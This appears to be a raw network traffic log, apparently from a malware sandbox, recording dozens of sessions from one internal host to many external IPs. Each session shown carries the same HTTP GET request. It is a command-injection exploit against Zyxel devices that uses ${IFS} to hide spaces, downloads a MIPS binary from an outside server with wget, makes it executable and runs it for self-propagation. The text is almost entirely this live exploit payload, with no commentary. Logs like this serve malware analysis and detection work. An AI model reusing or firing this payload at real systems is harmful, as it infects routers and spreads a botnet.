                                              Jan 29, 2024 07:03:36.746993065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1090192.168.2.1448564223.46.183.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747045040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1091192.168.2.144838665.5.26.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747085094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1092192.168.2.145461647.170.48.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747117996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1093192.168.2.1448510161.209.74.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747158051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1094192.168.2.1459974190.108.96.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747191906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1095192.168.2.144747686.236.111.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747243881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1096192.168.2.144463692.131.94.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747267008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1097192.168.2.145607465.41.130.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747306108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1098192.168.2.1448276204.144.76.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747344017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1099192.168.2.14373061.171.238.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747529984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1100192.168.2.1451556174.23.8.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747550964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1101192.168.2.145881494.83.143.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747601986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1102192.168.2.1440656149.36.243.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747637987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1103192.168.2.1444112138.33.129.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747675896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1104192.168.2.145112413.44.6.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747730017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1105192.168.2.1452422174.129.117.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747760057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1106192.168.2.145449019.206.92.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747816086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1107192.168.2.144868442.71.241.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747857094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1108192.168.2.1434686157.94.43.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747912884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1109192.168.2.1448090122.80.177.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747941971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1110192.168.2.144399047.37.66.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.747973919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1111192.168.2.143523098.189.44.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748001099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1112192.168.2.144395446.228.51.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748048067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1113192.168.2.145525280.125.177.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748084068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1114192.168.2.1454918112.109.134.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748121977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1115192.168.2.1453276130.213.140.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748158932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1116192.168.2.1439898184.188.216.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748198986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1117192.168.2.1448950174.99.72.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748239040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1118192.168.2.1443750167.232.154.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748271942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1119192.168.2.143943423.55.39.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748303890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1120192.168.2.143392042.69.154.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748356104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1121192.168.2.1440448149.120.255.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748377085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1122192.168.2.1454504114.168.64.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748408079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1123192.168.2.143789225.113.234.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748455048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1124192.168.2.1454924123.124.82.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748502016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1125192.168.2.1442376221.10.48.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748523951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1126192.168.2.1443096180.124.6.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748577118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1127192.168.2.144059678.78.10.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748614073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1128192.168.2.1445440132.198.96.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748648882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1129192.168.2.145924044.25.143.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748683929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1130192.168.2.1435776185.230.109.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748723030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1131192.168.2.1440690161.225.176.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748783112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1132192.168.2.144895645.29.254.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748795033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1133192.168.2.1436776210.195.96.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748856068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1134192.168.2.1453222104.168.16.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748893976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1135192.168.2.1441600181.34.90.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748934031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1136192.168.2.143743067.8.109.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.748965025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1137192.168.2.144324039.52.60.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749017000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1138192.168.2.1448526116.220.31.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749056101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1139192.168.2.1432856144.70.69.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749089956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1140192.168.2.1439364125.195.212.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749145985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1141192.168.2.1445558103.82.39.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749182940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1142192.168.2.1440888120.245.173.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749232054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1143192.168.2.1458692177.214.161.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749262094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1144192.168.2.145333218.128.86.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749306917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1145192.168.2.1448570126.93.58.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749339104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1146192.168.2.1433340122.93.34.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749386072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1147192.168.2.145353257.181.100.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749433041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1148192.168.2.1454092206.28.132.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749464035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1149192.168.2.1437906182.13.192.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749515057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1150192.168.2.1448864131.248.201.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749548912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1151192.168.2.146042634.32.49.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749579906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1152192.168.2.1435826172.105.63.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:36.749617100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1153192.168.2.1457446175.157.238.185443
                                              TimestampBytes transferredDirectionData
